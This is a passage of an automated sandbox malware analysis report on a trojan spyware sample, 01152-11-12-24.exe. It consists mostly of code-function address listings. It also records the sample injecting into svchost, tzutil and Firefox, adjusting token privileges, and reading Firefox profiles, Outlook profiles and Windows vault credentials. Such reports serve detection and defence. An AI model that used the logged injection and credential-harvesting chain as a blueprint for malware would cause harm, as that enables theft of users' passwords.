                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395FB807_2_0395FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B5BF07_2_039B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0397DBF97_2_0397DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039FFB767_2_039FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039DDAAC7_2_039DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03985AA07_2_03985AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039E1AA37_2_039E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039EDAC67_2_039EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039FFA497_2_039FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F7A467_2_039F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B3A6C7_2_039B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039D59107_2_039D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039499507_2_03949950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395B9507_2_0395B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039438E07_2_039438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039AD8007_2_039AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03941F927_2_03941F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039FFFB17_2_039FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03903FD27_2_03903FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03903FD57_2_03903FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039FFF097_2_039FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03949EB07_2_03949EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395FDC07_2_0395FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F1D5A7_2_039F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03943D407_2_03943D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F7D737_2_039F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039FFCF27_2_039FFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B9C327_2_039B9C32
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0393E3F011_2_0393E3F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039F03E611_2_039F03E6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039EA35211_2_039EA352
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039B02C011_2_039B02C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039D027411_2_039D0274
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039F01AA11_2_039F01AA
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039E41A211_2_039E41A2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039E81CC11_2_039E81CC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039CA11811_2_039CA118
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0392010011_2_03920100
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039B815811_2_039B8158
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039C200011_2_039C2000
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0392C7C011_2_0392C7C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0395475011_2_03954750
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0393077011_2_03930770
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0394C6E011_2_0394C6E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039F059111_2_039F0591
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0393053511_2_03930535
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039DE4F611_2_039DE4F6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039D442011_2_039D4420
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039E244611_2_039E2446
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039E6BD711_2_039E6BD7
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039EAB4011_2_039EAB40
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0392EA8011_2_0392EA80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039329A011_2_039329A0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039FA9A611_2_039FA9A6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0394696211_2_03946962
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039168B811_2_039168B8
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0395E8F011_2_0395E8F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0393A84011_2_0393A840
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0393284011_2_03932840
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039AEFA011_2_039AEFA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03922FC811_2_03922FC8
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0393CFE011_2_0393CFE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03950F3011_2_03950F30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039D2F3011_2_039D2F30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03972F2811_2_03972F28
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039A4F4011_2_039A4F40
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03942E9011_2_03942E90
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039ECE9311_2_039ECE93
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039EEEDB11_2_039EEEDB
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039EEE2611_2_039EEE26
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03930E5911_2_03930E59
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03948DBF11_2_03948DBF
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0392ADE011_2_0392ADE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039CCD1F11_2_039CCD1F
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0393AD0011_2_0393AD00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039D0CB511_2_039D0CB5
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03920CF211_2_03920CF2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03930C0011_2_03930C00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0397739A11_2_0397739A
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039E132D11_2_039E132D
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0391D34C11_2_0391D34C
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039352A011_2_039352A0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0394B2C011_2_0394B2C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039D12ED11_2_039D12ED
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0393B1B011_2_0393B1B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0391F17211_2_0391F172
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039FB16B11_2_039FB16B
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0396516C11_2_0396516C
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039DF0CC11_2_039DF0CC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039370C011_2_039370C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039E70E911_2_039E70E9
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039EF0E011_2_039EF0E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039EF7B011_2_039EF7B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039E16CC11_2_039E16CC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0397563011_2_03975630
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039CD5B011_2_039CD5B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039F95C311_2_039F95C3
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039E757111_2_039E7571
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039EF43F11_2_039EF43F
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0392146011_2_03921460
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0394FB8011_2_0394FB80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039A5BF011_2_039A5BF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0396DBF911_2_0396DBF9
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039EFB7611_2_039EFB76
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039CDAAC11_2_039CDAAC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03975AA011_2_03975AA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039D1AA311_2_039D1AA3
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039DDAC611_2_039DDAC6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039EFA4911_2_039EFA49
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039E7A4611_2_039E7A46
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039A3A6C11_2_039A3A6C
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039C591011_2_039C5910
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0393995011_2_03939950
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0394B95011_2_0394B950
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039338E011_2_039338E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0399D80011_2_0399D800
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03931F9211_2_03931F92
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039EFFB111_2_039EFFB1
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_038F3FD511_2_038F3FD5
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_038F3FD211_2_038F3FD2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039EFF0911_2_039EFF09
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03939EB011_2_03939EB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0394FDC011_2_0394FDC0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039E1D5A11_2_039E1D5A
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03933D4011_2_03933D40
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039E7D7311_2_039E7D73
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039EFCF211_2_039EFCF2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039A9C3211_2_039A9C32
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030A1FA011_2_030A1FA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0309CEA011_2_0309CEA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0309B20E11_2_0309B20E
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0309B21011_2_0309B210
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0309B0C011_2_0309B0C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_0309D0C011_2_0309D0C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030A564011_2_030A5640
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030A384B11_2_030A384B
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030A385011_2_030A3850
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030BBDC011_2_030BBDC0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_036DE2E511_2_036DE2E5
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_036DE79F11_2_036DE79F
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_036DE40611_2_036DE406
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_036DCB0311_2_036DCB03
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_036DD86811_2_036DD868
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: String function: 00910AE3 appears 70 times
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: String function: 008F7DE1 appears 35 times
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: String function: 00918900 appears 42 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0392B970 appears 277 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03975130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03987E54 appears 111 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 0391B970 appears 277 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 03965130 appears 58 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 0399EA12 appears 86 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 03977E54 appears 111 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 039AF290 appears 105 times
                Source: 01152-11-12-24.exe, 00000000.00000003.1279379840.0000000003B33000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 01152-11-12-24.exe
                Source: 01152-11-12-24.exe, 00000000.00000003.1281036561.0000000003CDD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 01152-11-12-24.exe
                Source: 01152-11-12-24.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@12/7
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0095A06A GetLastError,FormatMessageW,0_2_0095A06A
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009481CB AdjustTokenPrivileges,CloseHandle,0_2_009481CB
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009487E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_009487E1
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0095B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0095B3FB
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0096EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0096EE0D
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0095C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0095C397
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_008F4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_008F4E89
                Source: C:\Users\user\Desktop\01152-11-12-24.exeFile created: C:\Users\user~1\AppData\Local\Temp\autC19E.tmpJump to behavior
                Source: 01152-11-12-24.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\01152-11-12-24.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: tzutil.exe, 0000000B.00000003.1910572867.0000000003323000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000003.1910572867.0000000003344000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000003.1910465448.0000000003359000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3115425477.0000000003379000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3115425477.0000000003344000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 01152-11-12-24.exeReversingLabs: Detection: 44%
                Source: unknownProcess created: C:\Users\user\Desktop\01152-11-12-24.exe "C:\Users\user\Desktop\01152-11-12-24.exe"
                Source: C:\Users\user\Desktop\01152-11-12-24.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\01152-11-12-24.exe"
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeProcess created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"
                Source: C:\Windows\SysWOW64\tzutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\01152-11-12-24.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\01152-11-12-24.exe"Jump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeProcess created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\01152-11-12-24.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\01152-11-12-24.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\01152-11-12-24.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\01152-11-12-24.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\01152-11-12-24.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\01152-11-12-24.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\01152-11-12-24.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\01152-11-12-24.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\01152-11-12-24.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\01152-11-12-24.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\01152-11-12-24.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\01152-11-12-24.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: 01152-11-12-24.exeStatic file information: File size 1229312 > 1048576
                Source: 01152-11-12-24.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: 01152-11-12-24.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: 01152-11-12-24.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: 01152-11-12-24.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: 01152-11-12-24.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: 01152-11-12-24.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: 01152-11-12-24.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: tzutil.pdbGCTL source: svchost.exe, 00000007.00000003.1690915091.0000000003226000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1690729998.000000000321B000.00000004.00000020.00020000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000A.00000003.1660608819.000000000162B000.00000004.00000020.00020000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000A.00000002.3116655155.0000000001636000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hKAQraLbCUKXj.exe, 0000000A.00000002.3114857736.000000000076E000.00000002.00000001.01000000.00000005.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000000.1790005654.000000000076E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: 01152-11-12-24.exe, 00000000.00000003.1278771438.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, 01152-11-12-24.exe, 00000000.00000003.1278637589.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1625128286.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1725365860.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1627148015.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1725365860.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000003.1727279246.000000000373C000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3117979658.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3117979658.0000000003A8E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000003.1724054396.000000000358F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 01152-11-12-24.exe, 00000000.00000003.1278771438.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, 01152-11-12-24.exe, 00000000.00000003.1278637589.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000003.1625128286.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1725365860.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1627148015.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1725365860.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 0000000B.00000003.1727279246.000000000373C000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3117979658.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3117979658.0000000003A8E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000003.1724054396.000000000358F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: tzutil.exe, 0000000B.00000002.3115425477.00000000032BD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3118417486.0000000003F1C000.00000004.10000000.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000000.1790635169.00000000029DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2016740097.0000000035A4C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: tzutil.exe, 0000000B.00000002.3115425477.00000000032BD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3118417486.0000000003F1C000.00000004.10000000.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000000.1790635169.00000000029DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2016740097.0000000035A4C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: tzutil.pdb source: svchost.exe, 00000007.00000003.1690915091.0000000003226000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1690729998.000000000321B000.00000004.00000020.00020000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000A.00000003.1660608819.000000000162B000.00000004.00000020.00020000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000A.00000002.3116655155.0000000001636000.00000004.00000020.00020000.00000000.sdmp
